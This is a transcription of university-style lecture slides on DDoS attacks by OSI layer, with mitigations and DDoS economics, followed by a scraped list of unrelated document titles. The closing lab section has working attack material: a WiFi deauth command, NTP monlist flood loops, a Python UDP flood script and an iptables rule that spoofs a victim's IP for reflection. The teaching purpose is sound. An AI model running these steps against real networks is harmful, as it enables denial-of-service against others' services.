DDoS. Artūrs Lavrenovs
|
|
|
- Kellie Walton
- 10 years ago
- Views:
Transcription
1 DDoS Artūrs Lavrenovs
2 What is DDoS? DoS - denial-of-service attack is an attempt to make a machine or network resource unavailable to its intended users. DDoS are DoS attacks sent by two or more sources.
3 DDoS in a nutshell How DDoS works? Consumes any kind of resources required to process legitimate actions How to deal with DDoS? Allocate more resources than size of DDoS attack Try to filter out bad stuff
4 Who are the victims? Anything related to $ - Banks, CC processors, Online payment systems, Insurance/Investment/Financial/Trading companies Political sites Government sites News sites Piracy sites and anti-piracy outfits Game servers Almost any kind of business
5 Which OSI levels are susceptible to DDoS? ALL
6 OSI 1 st level - Physical Shared physical link for example: WiFi, radio, mobile, GPS, satellite Generate radio noise Can use as countersurveillance Price starting from few dozen $ Big devices (>1000$) can cover >1km How to deal with this DDoS? Use radar gun to locate signal source Call responsible agency (they will send a van with antennas on the roof) because it is a serious issue
7 Responsible agency: Latvia VAS Elektroniskie sakari Radiofrekvenču uzraudzības nodaļas Radiokontroles daļa
8 OSI 2 nd level Data Link WiFi (802.11) deauthentication Can disconnect all WiFi users Flood deauthentication packets so nobody can connect (or flood all except yourself) aireplay-ng --deauth a 00:11:22:33:44:55 wlan0 Powerful enough external WiFi card can interfere with clients inside building from outside How to deal? You have to find source and remove it (same as 1 st )
9 OSI 2 nd level Old school: MAC flooding Wired networking with switches Switches maintain MAC table in RAM (limited size), it maps MAC address<->physical ports Attacker floods Ethernet frames with random MAC When MAC tables overflows switch becomes hub and floods traffic out of all ports Not only DoS but also used for packet sniffing Solution - get a better switch Limiting MAC addresses per physical port Managed Switches
10 OSI 3 rd level Volumetric DDoS At this level reside volumetric DDoS Use more bandwidth that available to victim bits per second (bps) Send more packets that can be handled packets per second (pps) Victim has limited bandwidth available (e.g., 100mbps or 1gbs link) when link is saturated packets are getting dropped Including legitimate user packets, service slows down till it has became unusable How to deal with volumetric DDoS? You can't. At least not on your own.
11 OSI 3 rd level Network Spoofing IP At 3 rd level occurs source of the volumetric and other DDoS problems IP spoofing No ISP should allow packets with spoofed IP to leave their network Lots of bad ISPs, mostly in 3 rd world countries and places where are a lot of Internet Can't efficiently filter spoofed IP away from the source, effective only on your edge (BCP38) Volumetric DDoS without IP spoofing is far less efficient and could be filtered
12 OSI 3 rd level Spoofing IP
13 Volumetric DDoS Reflection/Amplification DNS, NTP, SNMP, ICMP reflection Create packets with spoofed victim's IP and send to reflectors Reflectors create response and send it to victim Amplification Response size usually bigger than request size so Amplification happens Increase amplification by crafting requests which generate bigger responses Potential for amplification 10x-100x If you have 1gbps spoofable uplink you can create up to 100gbps attack enough to kill small/medium DC/ISP
14 Volumetric DDoS Old school: Smurf attack ICMP reflection+amplification, packets are sent to network's broadcast IP Not viable attack anymore ISPs are blocking packets sent to broadcast IP
15 Volumetric DDoS DNS amplification DNS queries are short and usually answers are short as well, e.g., 1 IP address for A query Fill domain with some trash entries and query something specific or ANY (not all open resolvers might handle) Fill domain with many A entries (almost all open resolvers should handle) DNS resolver should use TCP if answer >512B long DNSSEC adds cryptographic signatures and keys to publicly visible records Luckily (misconfigured) server count is still low DNS server can be attacked (CPU intensive queries)
16 $ dig wradish.com ANY ;; Truncated, retrying in TCP mode. ; <<>> DiG P1 <<>> wradish.com ANY ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;wradish.com. IN ANY ;; ANSWER SECTION: wradish.com. 5 IN TXT "asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf " "asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf" wradish.com. 5 IN TXT "tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy ttttttttttttt" "yyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttt" "tttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy" wradish.com. 5 IN TXT "hkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdf hkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfh" "alsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfh alsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhf" "asdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhf asdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfh" "asdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfh asdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdf" wradish.com. 5 IN TXT "asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer as" "dfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer " wradish.com. 5 IN TXT "test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test tests" "ttest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest" " test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtes" "t test teststtest test test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest tes" "t te" wradish.com. 5 IN MX 10 mailstore1.secureserver.net. wradish.com. 5 IN MX 0 smtp.secureserver.net. wradish.com. 5 IN SOA ns19.domaincontrol.com. dns.jomax.net wradish.com. 5 IN NS ns20.domaincontrol.com. wradish.com. 5 IN NS ns19.domaincontrol.com. ;; Query time: 5 msec ;; SERVER: #53( ) ;; WHEN: Tue May 13 02:48: ;; MSG SIZE rcvd: 3782
17 Why Volumetric DDoS attacks work? Millions of misconfigured/vulnerable network devices DNS 28 million significant threats (May 2014) CloudFlare received 300gbps DDoS (March 2013) NTP Christmas present of 2013 CloudFlare received 400gbps (February 2014) only 4529 vulnerable NTP servers used
18 Volumetric DDoS - mitigation What is most common way to mitigate volumetric DDoS? Null-routing IP (attackers have achieved their goal) ISP/DC have to protect their network and customers How to deal with volumetric DDoS? Have/buy more IP transit and have enough processing power for packets Buy filtered IP transit How to deal with all volumetric DDoS in long run? Remove option to send spoofed IP (filtering on IP transit provider links) (hard) Remove all vulnerable servers (almost impossible)
19 OSI 4 th level - Transport TCP stack implementation requires tables and buffers in RAM allocated by OS SYN flood flood server with TCP SYN packets Send from different spoofed IP and different ports Server creates entry in TCP state table for each SYN packet Maximum entries (IP)2^32*(ports)2^16 takes more memory than available How to deal? Best practice is SYN cookies Proposed future standard TCPCT (solves some SYN cookies issues and instead creates other)
20 OSI 4 th level TCP SYN cookies Do not store SYN in state table SYN cookie = ($t%32)(mss)hash(sip,sp,dip,dp,$t) $t is timestamp with precision of 64 seconds MSS - maximum segment size Send to client SYN/ACK with initial TCP sequence number == SYN cookie Client responds with SYN cookie+1 Server calculates again and if matches establishes TCP session (responds with ACK and adds to TCP state table) Check (set) in Linux # sysctl net.ipv4.tcp_syncookies
21 OSI 4 th level Non amplified volumetric TCP DDoS Smaller than amplified UDP attacks (10xn gbps instead of 100xn gbps) Victim still (cookies don't help) have to reply with SYN/ACK packet if received SYN with spoofed IP Victim have to process all packets as real ones, it requires bandwidth equal to attackers (also high pps) Solution - intelligent analysis, requires a lot of processing power Does IP match some previous data (historical HTTP logs) Block dubious networks (DC, not announced, GEO)
22 OSI 4 th level Reflected TCP DDoS Attackers send SYN packets with spoofed victim's IP to real world servers with TCP services Real world servers send SYN/ACK to victim Fairly easy to deal with Victim (if server) has no reason to receive SYN/ACK Drop all SYN/ACK as far from victim as possible (ISP edge)
23 OSI 5 th level - Session RPC, NFS, PPTP, NetBIOS, etc. Weaknesses in implementations Spoofed IP Session terminations End device overloading Least interesting DDoS
24 OSI 6 th level - Presentation Most common target SSL (especially for $ category) Send lots/malformed SSL requests SSL consumes a lot of CPU cycles Response time decreases till service has become unusable Solution: SSL offloading + IDS/IPS/proprietary filtering systems Potential for DDoS compression Takes CPU cycles + memory Find on-demand compression and put/get as much as You can Solution: limiting and analyzing at 7 th OSI level
25 OSI 7 th level HTTP, FTP, POP, SMTP In case of TCP protocols IP spoofing does not work, You need a botnet Simple HTTP DoS: ab -n c Solution: limit requests in HTTP server or OS firewall HTTP DDoS solution Identify real user used limits Set them in HTTP server/os firewall Big botnet with each IP sending less requests than limit (GEO filters, prolonged logs)
26 OSI 7 th - Slowloris HTTP DDoS Evil client create as many concurrent HTTP connections as possible (lower than FW limitations) Keep connections open as long as possible Periodically send partial requests Multiple evil clients can exhaust HTTP server active connection pool Solution Use HTTP server with huge connection pools (e.g., nginx) Use some security ad-don
27 OSI 7 th + level Web applications residing in a web server Find slow processing parts of web application Usually data creation, deletion, modification Text search, DB LIMIT ,344 Send less requests than limited in 7 th level Find scripts that don't check parameter bounds, example Protection against bots captcha.php?length=5 captcha.php?length= consumes RAM and blocks till timeout (e.g., 60 seconds) 1req/sec blocks 60 PHP processes, 10req/s DDoS
28 IP spoofing before edge filtering Some ISP and DC have implemented IP filtering only on the edge (clients can spoof IP inside network) If network if big enough there are lots of different servers (DNS, NTP, HTTP) You can spoof victim's IP and create reflected DDoS (including TCP) Whole attack will originate from network you are using Easier to filter for victim, easier to notice by reflector network, easier to find attacker
29 Web savior CloudFlare CDN provider data centers across the globe Security includes DDoS protection which can handle biggest attacks Enough bandwidth to handle volumetric attacks Filters all DDoS, including OSI 7 th lvl Cheap 200$/month, previous comparable outsourced services would cost >1000$/mo Much cheaper than handling security yourself (man hours, hardware/software, outsource) if DDoS is eventually expected
30 Why not everyone using CloudFlare? USA company (all your data are available to NSA/FBI/CIA and any other organizations) All your data are handled by 3 rd party Have to give up your SSL certificate (big no-no for $ related sites) Privacy concerns ToS, Legal issues Does not protect network services (only Web) IP sharing (issues in countries/networks which block access to some content)
31 How to DDoS CloudFlare site? Don't waste effort attacking CloudFlare Find huge bug in 7 th+ OSI level which allows to DDoS using very few requests (rare) Volumetric DDoS backend IP, how to find: Use security audit tools to locate backend IP crawls site and searches for pattern for example in error messages (that is why you have to turn off all error reporting) Google for domain IP history, possibly backend is the same
32 How other filtering services work? Buy a lot of bandwidth from big DCs Volumetric DDoS uses download BW DCs have symmetrical links DCs usually are traffic generators (most servers use upload BW) Download BW can be bought at a fraction of the upload BW price Drop UDP, ICMP packets Intelligent TCP filtering Browser stack verification (is JavaScript implemented challenge/response) Statistical filtering (against HTTP flood)
33 DDoS redirection Common scenario botnet (or bought servers) in misconfigured networks queries DNS A record and (create amplified reflected volumetric DDoS) spoof IP accordingly Victim changes A record to suspected attacker, somebody he does not like or some government/military/law enforcement agency DDoS automatically converge to new victim Extremely gray area (possibly illegal) and victim should never do that Redirect attack to some of the attacking reflector nodes (e.g., misconfigured DNS servers)
34 (H-)Activism DDoS New form of protest Against government, big corporations, anyone else who people feel have been attacking their freedoms and interests LOIC (Low Orbit Ion Cannon) free software users choose to install to create TCP/UDP flood When many users launch LOIC to the same target it creates DDoS No reflection/amplification so can be filtered and users can be identified Richard Stallman has stated that DoS is a form of 'Internet Street Protests' Government treats as criminals
35 DDoS economics If attack is not used as form of protest then it is usually carried out by some DDoS service Cheap and small attacks starting 20$/day can break website with no/low protection Average attacks starting 50$/day can break site without protection against volumetric attacks (most average and even big sites) Ordering DDoS usually is cheaper than ordering filtering for victims (already victory for evil) Huge additional competing advantage (e.g., e-shop is down) Almost impossible to identify who is responsible
36 How people order DDoS? Use search engine Select one of many verified offers Get free test (10min) Order by hourly/daily rate (refunds available) Pay using shady online payment systems with high anonymity Never get caught
37 Professional DDoS Complex attack (efficient way is to wait till victim has dealt with issues before moving to next one) Check if weak authoritative NS (self hosted) then flood it Volumetric UDP DDoS Spoofed TCP flood HTTP attack with botnet (usually web stack implemented) Web application attack Dedicated hacker altering attack and analyzing 7 th+ level weaknesses Pricing >=1000$/day If you can counter such you are a rare professional
38 Unintentional DDoS By default most sites are not built and equipped to handle lots of (nx current number of users) legitimate users There are huge sites with millions of users where people post links reddit, slashdot, facebook Link to unprepared site gets posted and legitimate users kill it Web service specifics (usually found unintentionally and then exploited) FaceBook notes generate list of images and add random parameters, FB servers crawl and cache Google Spreadsheets same approach, use formula =image()
39 How banks should handle DDoS? Buy filtered IP transit from reliable and big ISP (SLA) Should be dropped all UDP Should be dropped TCP above SLA requirements Buy (proprietary) DDoS filtering device (a lot of $) with SLA and host on-site Bank signs SSL certificate with their own certificate Clients establish SSL connection with filter (using intermediate certificate) and it decides if client is good SSL session renegotiation with bank's servers Certificate never leaves bank's own servers and sensitive user data are never handled by filter as well Filter drops everything else and should handle 10x gbps of TCP
40 Summary Is UDP bad? Nope. It is actually quite good and useful protocol. Lazy network administrators have not configured their networks against IP spoofing. Is DNS/NTP/(put your protocol here) bad? Still nope. Those are quite useful protocols. Lazy network administrators are to blame Have not updated their server software Have misconfigured servers Commit no security audits Network device (cheap kind) manufacturers. Are You good network administrator?
41 Hands-on volumetric DDoS (discovery, IP spoofing, reflection, amplification) loosely corresponds to actions of actual attackers
42 Hands-on: real local network 1.Locate victim 2.Locate potential attack sources 3.Check attack sources 4.Spoof IP address 5.Create DDoS 6.Increase amplification Our setup: Local network = Internet Subnet /24
43 Hands-on: locate victims and attack sources Use some software to map your local network to find victims For example: nmap Choose one of the found web servers as victim There are 2 types of attack available, multiple sources for both, choose one or both Query and check if attack sources work
44 Hands-on: DNS Query DNS server: # host google.lv # dig google.lv Find queries which generate large responses
45 Hands-on: NTP ntpdate -q $ntp_server ntpdc -nc monlist $ntp_server Check maximum BW (ifstat -b) #!/bin/bash while true; do ntpdc -n -c monlist $ntp_server > /dev/null & done Why so little BW available?
46 import socket Hands-on: NTP Python payload = """\x17\x00\x03\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00""" sock = socket.socket(socket.af_inet, socket.sock_dgram) while True: sock.sendto(payload, (" ", 123))
47 Hands-on: Spoof IP NTP $ sudo iptables -t nat -A POSTROUTING -p udp --dport 123 -j SNAT --to-source $victim_ip All UPD packets with destination port 123 (default for NTP) will be altered and source will be set to $victim_ip IP can be also spoofed using some tools that can create RAW packets, e.g., Scapy, Nemesis
48 Hands-on: create DDoS Launch on multiple PCs Python version (if site still up) Or if you can write program in C/C++ Try to access website (or see if it slows down) measure: # time curl -v $victim
49 Hands-on: increase amplification (NTP) Why small amplification (less than 2x)? monlist response is client list Goal increase client list on server but how? Spoof lots of different IP Send ntpdate -q $ntp_server from each spoofed IP Monlist response maximum client list is 600
50 Hands-on: Virtual Network version If you want to try yourself: ual-network
51 Hands-on: Setting things up NTP apt-get install ntp Edit /etc/ntp.conf restrict mask nomodify notrap service ntp restart
DDoS. Artūrs Lavrenovs
DDoS Artūrs Lavrenovs What is DDoS? DoS - denial-of-service attack is an attempt to make a machine or network resource unavailable to its intended users. DDoS are DoS attacks sent by two or more sources.
Acquia Cloud Edge Protect Powered by CloudFlare
Acquia Cloud Edge Protect Powered by CloudFlare Denial-of-service (DoS) Attacks Are on the Rise and Have Evolved into Complex and Overwhelming Security Challenges TECHNICAL GUIDE TABLE OF CONTENTS Introduction....
CloudFlare advanced DDoS protection
CloudFlare advanced DDoS protection Denial-of-service (DoS) attacks are on the rise and have evolved into complex and overwhelming security challenges. 1 888 99 FLARE [email protected] www.cloudflare.com
Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst
INTEGRATED INTELLIGENCE CENTER Technical White Paper William F. Pelgrin, CIS President and CEO Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst This Center for Internet Security
Security of IPv6 and DNSSEC for penetration testers
Security of IPv6 and DNSSEC for penetration testers Vesselin Hadjitodorov Master education System and Network Engineering June 30, 2011 Agenda Introduction DNSSEC security IPv6 security Conclusion Questions
DRDoS Attacks: Latest Threats and Countermeasures. Larry J. Blunk Spring 2014 MJTS 4/1/2014
DRDoS Attacks: Latest Threats and Countermeasures Larry J. Blunk Spring 2014 MJTS 4/1/2014 Outline Evolution and history of DDoS attacks Overview of DRDoS attacks Ongoing DNS based attacks Recent NTP monlist
TDC s perspective on DDoS threats
TDC s perspective on DDoS threats DDoS Dagen Stockholm March 2013 Lars Højberg, Technical Security Manager, TDC TDC in Sweden TDC in the Nordics 9 300 employees (2012) Turnover: 26,1 billion DKK (2012)
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks
co Characterizing and Tracing Packet Floods Using Cisco R
co Characterizing and Tracing Packet Floods Using Cisco R Table of Contents Characterizing and Tracing Packet Floods Using Cisco Routers...1 Introduction...1 Before You Begin...1 Conventions...1 Prerequisites...1
CS 356 Lecture 16 Denial of Service. Spring 2013
CS 356 Lecture 16 Denial of Service Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists Chapter
A1.1.1.11.1.1.2 1.1.1.3S B
CS Computer 640: Network AdityaAkella Lecture Introduction Networks Security 25 to Security DoS Firewalls and The D-DoS Vulnerabilities Road Ahead Security Attacks Protocol IP ICMP Routing TCP Security
Denial of Service Attacks
2 Denial of Service Attacks : IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 August 2013 its335y13s2l06, Steve/Courses/2013/s2/its335/lectures/malicious.tex,
DDoS Attacks - Peeling the Onion on One of the Most Sophisticated Ever Seen. Eldad Chai, VP Product
DDoS Attacks - Peeling the Onion on One of the Most Sophisticated Ever Seen Eldad Chai, VP Product Incapsula Application Delivery from the Cloud 2 DDoS 101 ISP Network Devices Web servers Applications
How to launch and defend against a DDoS
How to launch and defend against a DDoS John Graham-Cumming October 9, 2013 The simplest way to a safer, faster and smarter website DDoSing web sites is... easy Motivated groups of non-technical individuals
VALIDATING DDoS THREAT PROTECTION
VALIDATING DDoS THREAT PROTECTION Ensure your DDoS Solution Works in Real-World Conditions WHITE PAPER Executive Summary This white paper is for security and networking professionals who are looking to
Seminar Computer Security
Seminar Computer Security DoS/DDoS attacks and botnets Hannes Korte Overview Introduction What is a Denial of Service attack? The distributed version The attacker's motivation Basics Bots and botnets Example
CS5008: Internet Computing
CS5008: Internet Computing Lecture 22: Internet Security A. O Riordan, 2009, latest revision 2015 Internet Security When a computer connects to the Internet and begins communicating with others, it is
DISTRIBUTED DENIAL OF SERVICE OBSERVATIONS
: DDOS ATTACKS DISTRIBUTED DENIAL OF SERVICE OBSERVATIONS 1 DISTRIBUTED DENIAL OF SERVICE OBSERVATIONS NTT is one of the largest Internet providers in the world, with a significant share of the world s
Chapter 8 Security Pt 2
Chapter 8 Security Pt 2 IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross,
Abstract. Introduction. Section I. What is Denial of Service Attack?
Abstract In this report, I am describing the main types of DoS attacks and their effect on computer and network environment. This report will form the basis of my forthcoming report which will discuss
DDoS Protection on the Security Gateway
DDoS Protection on the Security Gateway Best Practices 24 August 2014 Protected 2014 Check Point Software Technologies Ltd. All rights reserved. This product and related documentation are protected by
CSE 127: Computer Security. Network Security. Kirill Levchenko
CSE 127: Computer Security Network Security Kirill Levchenko December 4, 2014 Network Security Original TCP/IP design: Trusted network and hosts Hosts and networks administered by mutually trusted parties
SECURING APACHE : DOS & DDOS ATTACKS - I
SECURING APACHE : DOS & DDOS ATTACKS - I In this part of the series, we focus on DoS/DDoS attacks, which have been among the major threats to Web servers since the beginning of the Web 2.0 era. Denial
DDoS Attacks & Mitigation
DDoS Attacks & Mitigation Sang Young Security Consultant [email protected] 1 DoS Attack DoS & DDoS an attack render a target unusable by legitimate users DDoS Attack launch the DoS attacks from various
DNS amplification attacks
amplification attacks Matsuzaki Yoshinobu 2006/04/25 Copyright (C) 2006 Internet Initiative Japan Inc. 1 amplification attacks Attacks using IP spoofed dns query generating a traffic overload
Firewall Firewall August, 2003
Firewall August, 2003 1 Firewall and Access Control This product also serves as an Internet firewall, not only does it provide a natural firewall function (Network Address Translation, NAT), but it also
How To Attack Isc.Org.Org With A Dnet On A Network With A Pnet On The Same Day As A Dbus On A Pc Or Ipnet On An Ipnet.Org On A 2.5Th Gen.Net
Surviving a DDoS Attack: What every host needs to know Maria Karaivanova, Business Development David Koston, Platform www.cloudflare.com DDoS Attacks are becoming massive, and easier to initiate!2 Major
DoS/DDoS Attacks and Protection on VoIP/UC
DoS/DDoS Attacks and Protection on VoIP/UC Presented by: Sipera Systems Agenda What are DoS and DDoS Attacks? VoIP/UC is different Impact of DoS attacks on VoIP Protection techniques 2 UC Security Requirements
Protect your network: planning for (DDoS), Distributed Denial of Service attacks
Protect your network: planning for (DDoS), Distributed Denial of Service attacks Nov 19, 2015 2015 CenturyLink. All Rights Reserved. The CenturyLink mark, pathways logo and certain CenturyLink product
Introduction to DDoS Attacks. Chris Beal Chief Security Architect MCNC [email protected] @mcncsecurity on Twitter
Introduction to DDoS Attacks Chris Beal Chief Security Architect MCNC [email protected] @mcncsecurity on Twitter DDoS in the News Q1 2014 DDoS Attack Trends DDoS Attack Trends Q4 2013 Mobile devices
CMPT 471 Networking II
CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access
How To Understand A Network Attack
Network Security Attack and Defense Techniques Anna Sperotto (with material from Ramin Sadre) Design and Analysis of Communication Networks (DACS) University of Twente The Netherlands Attacks! Many different
How To Protect A Dns Authority Server From A Flood Attack
the Availability Digest @availabilitydig Surviving DNS DDoS Attacks November 2013 DDoS attacks are on the rise. A DDoS attack launches a massive amount of traffic to a website to overwhelm it to the point
About Firewall Protection
1. This guide describes how to configure basic firewall rules in the UTM to protect your network. The firewall then can provide secure, encrypted communications between your local network and a remote
Secure Software Programming and Vulnerability Analysis
Secure Software Programming and Vulnerability Analysis Christopher Kruegel [email protected] http://www.auto.tuwien.ac.at/~chris Operations and Denial of Service Secure Software Programming 2 Overview
/ Staminus Communications
/ Staminus Communications Global DDoS Mitigation and Technology Provider Whitepaper Series True Cost of DDoS Attacks for Hosting Companies The most advanced and experienced DDoS mitigation provider in
DDoS Overview and Incident Response Guide. July 2014
DDoS Overview and Incident Response Guide July 2014 Contents 1. Target Audience... 2 2. Introduction... 2 3. The Growing DDoS Problem... 2 4. DDoS Attack Categories... 4 5. DDoS Mitigation... 5 1 1. Target
1. Firewall Configuration
1. Firewall Configuration A firewall is a method of implementing common as well as user defined security policies in an effort to keep intruders out. Firewalls work by analyzing and filtering out IP packets
Surviving DNS DDoS Attacks. Introducing self-protecting servers
Introducing self-protecting servers Background The current DNS environment is subject to a variety of distributed denial of service (DDoS) attacks, including reflected floods, amplification attacks, TCP
How To Stop A Ddos Attack On A Website From Being Successful
White paper Combating DoS/DDoS Attacks Using Cyberoam Eliminating the DDoS Threat by Discouraging the Spread of Botnets www.cyberoam.com Introduction Denial of Service (DoS) and Distributed Denial of Service
20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7
20-CS-6053-00X Network Security Spring, 2014 An Introduction To Network Security Week 1 January 7 Attacks Criminal: fraud, scams, destruction; IP, ID, brand theft Privacy: surveillance, databases, traffic
DDoS Attacks: The Latest Threat to Availability. Dr. Bill Highleyman Managing Editor Availability Digest
DDoS Attacks: The Latest Threat to Availability Dr. Bill Highleyman Managing Editor Availability Digest The Anatomy of a DDoS Attack Sombers Associates, Inc. 2013 2 What is a Distributed Denial of Service
A Very Incomplete Diagram of Network Attacks
A Very Incomplete Diagram of Network Attacks TCP/IP Stack Reconnaissance Spoofing Tamper DoS Internet Transport Application HTTP SMTP DNS TCP UDP IP ICMP Network/Link 1) HTML/JS files 2)Banner Grabbing
Attack and Defense Techniques
Network Security Attack and Defense Techniques Anna Sperotto, Ramin Sadre Design and Analysis of Communication Networks (DACS) University of Twente The Netherlands Attack Taxonomy Many different kind of
1. Introduction. 2. DoS/DDoS. MilsVPN DoS/DDoS and ISP. 2.1 What is DoS/DDoS? 2.2 What is SYN Flooding?
Page 1 of 5 1. Introduction The present document explains about common attack scenarios to computer networks and describes with some examples the following features of the MilsGates: Protection against
Network Security. Dr. Ihsan Ullah. Department of Computer Science & IT University of Balochistan, Quetta Pakistan. April 23, 2015
Network Security Dr. Ihsan Ullah Department of Computer Science & IT University of Balochistan, Quetta Pakistan April 23, 2015 1 / 24 Secure networks Before the advent of modern telecommunication network,
Session Hijacking Exploiting TCP, UDP and HTTP Sessions
Session Hijacking Exploiting TCP, UDP and HTTP Sessions Shray Kapoor [email protected] Preface With the emerging fields in e-commerce, financial and identity information are at a higher risk of being
Protecting and controlling Virtual LANs by Linux router-firewall
Protecting and controlling Virtual LANs by Linux router-firewall Tihomir Katić Mile Šikić Krešimir Šikić Faculty of Electrical Engineering and Computing University of Zagreb Unska 3, HR 10000 Zagreb, Croatia
Firewall implementation and testing
Firewall implementation and testing Patrik Ragnarsson, Niclas Gustafsson E-mail: [email protected], [email protected] Supervisor: David Byers, [email protected] Project Report for Information
Firewalls. Firewalls. Idea: separate local network from the Internet 2/24/15. Intranet DMZ. Trusted hosts and networks. Firewall.
Firewalls 1 Firewalls Idea: separate local network from the Internet Trusted hosts and networks Firewall Intranet Router DMZ Demilitarized Zone: publicly accessible servers and networks 2 1 Castle and
Cheap and efficient anti-ddos solution
Cheap and efficient anti-ddos solution Who am I? Alexei Cioban Experience in IT 13 years CEO & Founder IT-LAB 7 years IT trainings 5 years 2 About company Year of foundation - 2007 12 employees www.it-lab.md
Linux Network Security
Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols
FortiDDos Size isn t everything
FortiDDos Size isn t everything Martijn Duijm Director Sales Engineering April - 2015 Copyright Fortinet Inc. All rights reserved. Agenda 1. DDoS In The News 2. Drawing the Demarcation Line - Does One
Project 4: (E)DoS Attacks
